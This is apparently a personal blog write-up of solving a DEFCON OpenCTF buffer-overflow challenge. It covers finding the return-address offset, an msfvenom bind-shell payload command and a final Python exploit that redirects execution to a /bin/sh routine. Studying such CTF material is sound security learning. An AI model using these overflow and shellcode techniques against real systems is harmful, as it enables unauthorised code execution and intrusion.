Friday, August 26, 2016

"tyro" ... really?

The following falls somewhere between being an attempt to provide you with a useful guide on exploiting a vulnerable program, and therapy for me.  :-)

This year's DEFCON was, as usual, fantastic.  Since I've been working recently on trying to develop some offensive skills, I thought it would be fun to play around with the OpenCTF which was being held at DEFCON.  Yeah, right.

I won't go much into the rest of the OpenCTF, other than to say it was fantastic and I highly recommend giving it a try.

After my team-mate, Ron, and I had dispatched all the low hanging fruit we could find, we turned our attention to what seemed like the main attraction of the first level in the game - a series of services over the network.  They were named "tyro_" followed by some type of vulnerability.  For example, "tyro_heap" or "tyro_infoleak1".  Tyro - noun: a beginner or novice. Perfect, some nice warmups before we get to the real challenges.

What made these challenges especially appealing was that you could download the program providing the "service".  This means that you could transfer it to your own machine, load it up into a debugger and plumb its secrets utilizing whatever 31337 forensics and reverse engineering tools you have at your disposal.  Cool, what could go wrong with that?  My DEFCON Black Badge was within grasp.

Like every self-respecting DEFCON attendee, I had built a special laptop to take to DEFCON.  In order to be prepared for whatever DEFCON threw my way, I had loaded it with several different virtual machines.  Far and away the most important tool I loaded on my machine was a spanking clean, brand new VM running Kali.  And since bigger and newer is better, it was the 64 bit, rolling update, distribution of Kali. No running out of virtual memory for this hacker.  :-)

That turned out to be my undoing.

So when Ron and I started playing with the "tyro" challenges on my laptop, we hit a bit of a snag.  Although they were certainly Linux executable binaries, they all would not run.  Turns out that the 64 bit Kali distribution I had didn't have the right libraries to run these particular 32 bit binaries.  Ouch!

Rather than wax eloquent on the sequence of wrong turns and wasted time that followed I'll just state:
  • Several other folks at the CTF managed to overcome this problem.  But despite helpful suggestions from others I never figured out how to get that Kali image to run these challenges.  Although I could be wrong, I think the way that the rolling update is configured, combined with my ignorance, prevented these helpful suggestions from working. I'm sure there was a way to get it working, I just couldn't figure it out.
  • In any other situation, my solution would have been to download the 32 bit Kali image and use that.  But the "safe" DEFCON network was too slow (e.g. 12+ hours to download the ISO), I wasn't willing to try the "unsafe" network, and any other options I had were even slower.
I ended up eventually moving on to other things at DEFCON, and I brought home some challenges to play with at my leisure.
__________________________________________________________

Several weeks after DEFCON I finally had some time to play with one of the "tyro" challenges, "tyro_overflow1".  In hopes of helping others avoid my mistakes, here's a description of how I managed to figure out this challenge.


When you run the executable (on the 32-bit Kali distribution) the program prints its name and then prompts you for input, "Can you trigger the success function?".  If you type in some short string, it says "Got ", followed by your input, an exclamation point, and then exits.


hmmm, this is "tyro_overflow" ... what are the chances that by providing a long input string I can overflow some buffer and find a vulnerability?


Well, that's interesting.  If the input is too long, the program crashes.  Let's pursue this in more detail.  To the debugger!

If it's not already clear, I'm still a beginner at the offensive side of security.  So far the only Linux debugger I've had any experience with is "edb" (Evan's Debugger).   To start edb with the challenge program:

edb --run ./tyro_overflow1_0601e9d93a2ff84ae7a85dc199fa8233 

Once edb is up and has the challenge loaded, we can start by running the challenge and seeing if we can reproduce the crash that we've discovered.

In edb, select "run" twice (from the "Debug" menu) to run the program (the first "run" will load the program and then pause it.)

Now is a good time to observe one of the nasties the creators of this challenge left for us.  When the challenge starts running, it sets an alarm which terminates the program after 30 seconds.  So once you start the program running you have 30 seconds to provide the input before it aborts.  Here's an example of that (using the Unix "time" command so you can see how long it takes to abort.)


When you start running the challenge, a simple window will pop up with the output from tyro_overflow. You can also provide input to the program in this window.

A natural first step is to reproduce our long string which crashed the program, and see if edb can help us figure out how to take advantage of this vulnerability.


YEEEHAW!!! You can see in the screen-shot above that when I provided the long string of 'A's to the program, the debugger caught the resulting crash.

Here's what's really exciting about that crash ... the program crashed because it tried to execute code at an invalid address.  But look at the address it tried to execute, hex 41414141.  For those of you who haven't memorized the ASCII codes, hex 41 is the ASCII code for 'A'!
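If you'd rather let the computer do the ASCII lookup, here's a tiny Python 3 sketch (my own addition, not something I ran at the CTF) that splits the crash address into its 4 bytes and shows them as characters:

```python
# The faulting address reported by the debugger, as a 32-bit value.
crash_addr = 0x41414141

# Split it into its four bytes, in the order x86 keeps them in memory.
raw = crash_addr.to_bytes(4, "little")

print(raw)            # the four input bytes that ended up being used as an address
print(hex(ord("A")))  # the ASCII code of 'A'
```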

What we're seeing is that somehow, 4 of the 'A's that I fed the program got used as an address for it to go to.  That means that by adjusting my input I can make the program go to any address I want!  (Ignoring the possibility that my input may get munged somehow.)  Talk about raw power! This discovery is the key to compromising this program.  Everything from here on is just building on my ability to force the program to go to an address I specify.

At this point in my investigation, I managed to snatch defeat from the jaws of victory.  But it might be interesting anyway, and it's therapeutic for me, so I'll describe the path I took to finally understanding this challenge.

Based on what I've been studying recently, the 'conventional' path that one takes when exploiting a buffer overflow like this goes along the lines of:
  • Identify where in the input we're actually providing the address to goto.
  • Figure out how to provide some malicious code for the compromised program to run.  This is typically the "shell code" that we often embed in the overly long input. 
  • Figure out how to make the program execute the shell code.  This can be tricky because you usually don't know ahead of time what address your shell code is going to end up at.  If it always ended up at the same address, you could just use your control of where the computer goes, to go to your shell code.

Once I came down from the adrenaline high of controlling where the program goes, I began to address the question of which of the many 'A's that I typed are actually the ones which control where the program goes.  Kali includes a really neat Metasploit tool for doing this.  Behold!


The tool pattern_create creates a string which has the property that any four character sequence in it occurs only once.  In the command above, I created a 200 character string.  When I reran the challenge under edb, and pasted this special string into the input window, the program crashed again - but this time at a different address which came from the input string.


(BTW, you can paste into the window that edb provides by using the middle mouse button. On most mice, this is done by pushing down on the scroll wheel.)

The address it crashed at, hex 37654136, came from 4 characters in the input string.  The companion program to pattern_create, pattern_offset, will tell me where in the input string these 4 characters are. (Yes, I could do this by hand, but I have a computer to do it for me)
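If you don't have Metasploit handy, here's a rough Python 3 sketch of what the two tools do.  The function names mirror the Metasploit tools, but the code is my own approximation and not their implementation.  It assumes the usual "Aa0Aa1Aa2..." pattern layout (upper case letter, lower case letter, digit) and that the crash address holds 4 input bytes in little endian order.

```python
import string

def pattern_create(length):
    """Build an Aa0Aa1Aa2... style pattern, truncated to `length` characters."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]

def pattern_offset(crash_addr, length):
    """Return where the 4 bytes of `crash_addr` sit in the pattern, or -1."""
    # The address is read from memory in little endian order, so undo that
    # to recover the 4 characters as they appeared in the input.
    needle = crash_addr.to_bytes(4, "little").decode("ascii")
    return pattern_create(length).find(needle)

pattern = pattern_create(200)
offset = pattern_offset(0x37654136, 200)

print(pattern[:12])
print(offset)
```

Feeding it the crash address from above gives the position in the input of the 4 characters that ended up being used as the address.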

So now I've found that it's the 4 characters starting at 140 characters into the input string which control where the program goes.  Just to double check, let's create a prototype exploit program and prove that we know how to control where the challenge program goes.
___________________________________
#!/usr/bin/python

# Test program to verify that we can make
# tyro_overflow go to an address we specify

padding1 = 'A' * 140   # pad out to 140

jmpAddr = 'BBBB'       # where we say to goto

padding2 = 'C' * 100   # just to make sure input is big

exploitString = padding1 + jmpAddr + padding2

print exploitString
___________________________________

When we run our new program, we get the following output:


When we paste the string from our new program into tyro_overflow, we get the following crash:


which shows that our exploit was able to make tyro_overflow go to the address Hex 42424242 (which is the ASCII for 'BBBB' that we used as the address.)

Up to this point, everything I've done can be used for the working exploit (although as I'll point out later, some of it was unnecessary.)

However, from here I went down the wrong path.  Eventually I had to back up and try a different route.  Nobody ever said this stuff was easy!  I'll briefly show what I did anyway; it's interesting and under some circumstances it would have been correct.

At this point, I started to look at the state of the various system registers during the crash.
  • You can see the current value of a register by double-clicking on it (the registers are in the upper right of the display.)
  • If you right-click in the "Data Dump" area, you can select "Goto Address" to make the Data Dump area show you the contents of memory at a specific address.

Using these tools, I discovered that the "ESP" register (aka the extended stack pointer) was pointing to the next character in my input string after the "address" of BBBB.  This is fantastic!  This means that right after I put the address to go to, I can load up my input string with shell code with no size restrictions (if I had to use the string before the address, it probably would be limited to 140 bytes of shell code which might have been tight.)

I won't go into detail on how to produce the shell code, but if you're interested, I generated it with another Metasploit tool ....

 msfvenom -p 'linux/x86/shell_bind_tcp' LPORT=31337 -n 20 -e x86/alpha_mixed -f python

This produced a string I could include in a python program. The string corresponded to shell code which would have started a shell on the system and listened for connections on port 31337.  But as I mentioned above, this turned out to be the wrong approach to compromising this application.

The final step necessary to complete this compromise would have been to find some pre-existing code that I could direct the computer to which would in turn execute my shell code.

Keep in mind, I've discovered that the ESP register is now pointing directly to my shell code.  All I need to do is find code already in place which will reliably jump to the address in ESP.

And this is where my world came apart.  In the "Plugins" menu, edb has an "OpcodeSearcher" tool which will search for specific instructions in memory.  This tool is intended for just this type of use, and using it I found numerous 'jmp ESP' instructions (search for "ESP -> EIP").  However, none of the ones I tried stayed in the same memory location between program runs.  This made it impossible for me to reliably find a way to jump to my shell code.  There may be a bit of code somewhere that would have worked, but I hadn't found it when I decided to try other approaches.
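For the curious, the simplest form of that kind of search is just a scan for the bytes FF E4, which is the x86 machine code for 'jmp esp'.  Here's a Python 3 sketch of the idea.  It is my own illustration and not how the edb plugin is implemented, and the bytes being searched are made up rather than taken from the challenge.

```python
JMP_ESP = b"\xff\xe4"   # x86 machine code for `jmp esp`

def find_all(haystack, needle):
    """Return every offset at which `needle` occurs in `haystack`."""
    offsets = []
    start = haystack.find(needle)
    while start != -1:
        offsets.append(start)
        start = haystack.find(needle, start + 1)
    return offsets

# Made-up bytes standing in for a mapped code region (not from the challenge).
region = b"\x90\x90\xff\xe4\xc3\x55\x89\xe5\xff\xe4\x90"

print(find_all(region, JMP_ESP))
```

The offsets only help if the region is loaded at the same address on every run, which is exactly what didn't hold for the candidates I tried.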

Here is where I got back on the right path ... almost!

While I was using edb to look at the input string in the Data Dump window, I happened to come across the place in memory where tyro_overflow stores the strings which it uses.



Notice that the string "/bin/sh" is there along with the other strings we've seen the program use.  Wow! Where does the program use this string? Does it already have "shell code", just waiting for me to jump to?  Could this be what the message "Can you trigger the success function" refers to?

I'll tell you now, the answer to the last 2 questions is yes and yes. :-)

So here's the final trick which eluded me until I looked up somebody else's solution to this challenge.

Looking in the data dump, we can see that the string '/bin/sh' resides in memory starting at address Hex 08048700.  Any code in the program which uses this string must somehow refer to this memory address when it invokes /bin/sh.  So I spent a fair amount of time using the edb Reference Searcher plugin trying to find code which referred to this memory location.  When that didn't pan out, I tried using the Binary Searcher to search for any part of the program which had this memory address in it.  No dice.

What was I doing wrong?  This had to be the right approach!

Finally, I looked at somebody else's (Blast Hardcheese) solution - and it all became clear.

The mistake I made was that when I searched for 08048700, i.e. the address of the string '/bin/sh', I didn't take into account that on Intel x86 computers, addresses are stored in 'little endian' format.  This means that the actual bytes in memory are stored in opposite order than we read them.  Instead of searching for 08048700, I should have searched for 00870408.  If I had, I would have found the following little snippet of code:


You can see in the 4th line that the address of the string '/bin/sh' (08048700) is loaded into the stack and then some subroutine is called.  That's enough to show that this is the routine we need to call.
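The byte order mix-up is easy to reproduce.  Here's a Python 3 sketch using a made-up blob of bytes in place of the real program code.  The 0x68 opcode byte and the filler are purely for illustration (the actual instruction in the binary may well be different); the point is only the order of the 4 address bytes.

```python
import struct

bin_sh_addr = 0x08048700   # address of the '/bin/sh' string

# Hypothetical stand-in for a few bytes of program code: an opcode byte,
# the address as a 32-bit little endian operand, then some filler.
code = b"\x68" + struct.pack("<I", bin_sh_addr) + b"\x90\x90"

as_read = bytes.fromhex("08048700")          # the order we read the address in
as_stored = struct.pack("<I", bin_sh_addr)   # the order x86 stores it in

print(as_stored.hex())
print(code.find(as_read))     # -1 means "not found"
print(code.find(as_stored))   # offset of the operand within the blob
```

Searching for the bytes in reading order comes up empty, while searching in stored order finds the operand right after the opcode byte.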

Remember, we know that the program will go to whatever address sits in the 4 bytes starting 140 characters into our input string.  So if we put Hex 0804858d (which is where the code above starts) in the input string there, we'll end up running the code which uses '/bin/sh'.  WoooHoooo!

One last detail remains, which is to discover by trial and error that this routine actually reads a command from the user input to execute when it calls /bin/sh.

Although not critical to success, I also discovered that there is no need for the input string to extend beyond the address to go to.  So it only needs to be 144 characters long.
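To make that layout concrete, here's a Python 3 sketch that builds the input as raw bytes and checks its length.  The names (OFFSET, SUCCESS_ADDR, build_payload, write_exploit) are mine, and the numbers are the ones found above.  One thing to watch in Python 3: the payload has to be written as bytes, because print() on a text string would re-encode the 0x8d byte as two bytes and spoil the address.

```python
OFFSET = 140                # bytes of padding before the address to go to
SUCCESS_ADDR = 0x0804858d   # start of the routine that uses '/bin/sh'

def build_payload():
    """Padding followed by the target address in little endian byte order."""
    return b"A" * OFFSET + SUCCESS_ADDR.to_bytes(4, "little")

def write_exploit(out, command=b"uname -a"):
    """Write the overflow line, then the command the routine reads next."""
    out.write(build_payload() + b"\n")
    out.write(command + b"\n")

payload = build_payload()
print(len(payload))         # total length of the overflow line
print(payload[-4:].hex())   # the address bytes as they will sit in memory
```

To actually feed it to the challenge, something like write_exploit(sys.stdout.buffer) (after an import sys) should do, with the script's output piped into the program.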

So here's the essence of the exploit:
  • Overly long input will cause the program to read the 4 bytes starting 140 characters into the input and go to that address. BTW, those 4 bytes need to be in little endian format.  :-)
  • At Hex 0804858d is a routine which will read the next line of input, and execute that command in /bin/sh
  • So we provide an input string which has the hex value 0804858d starting 140 characters in.
  • On the next line, provide a command to execute
Here's the final exploit:
___________________________________
#!/usr/bin/python

# exploit a buffer overflow in the OpenCTF challenge, tyro_overflow

padding = ('A' * 140)  # Overflow the input with 140 characters

jmpAddr = '\x8d\x85\x04\x08'  # 0x0804858d in little endian format

exploitString = padding + jmpAddr

print exploitString

print "uname -a"   # just a command to show it worked
___________________________________

And here it is in action:



Here's the other writeup which helped me figure out what I was missing:

https://ctftime.org/writeup/3643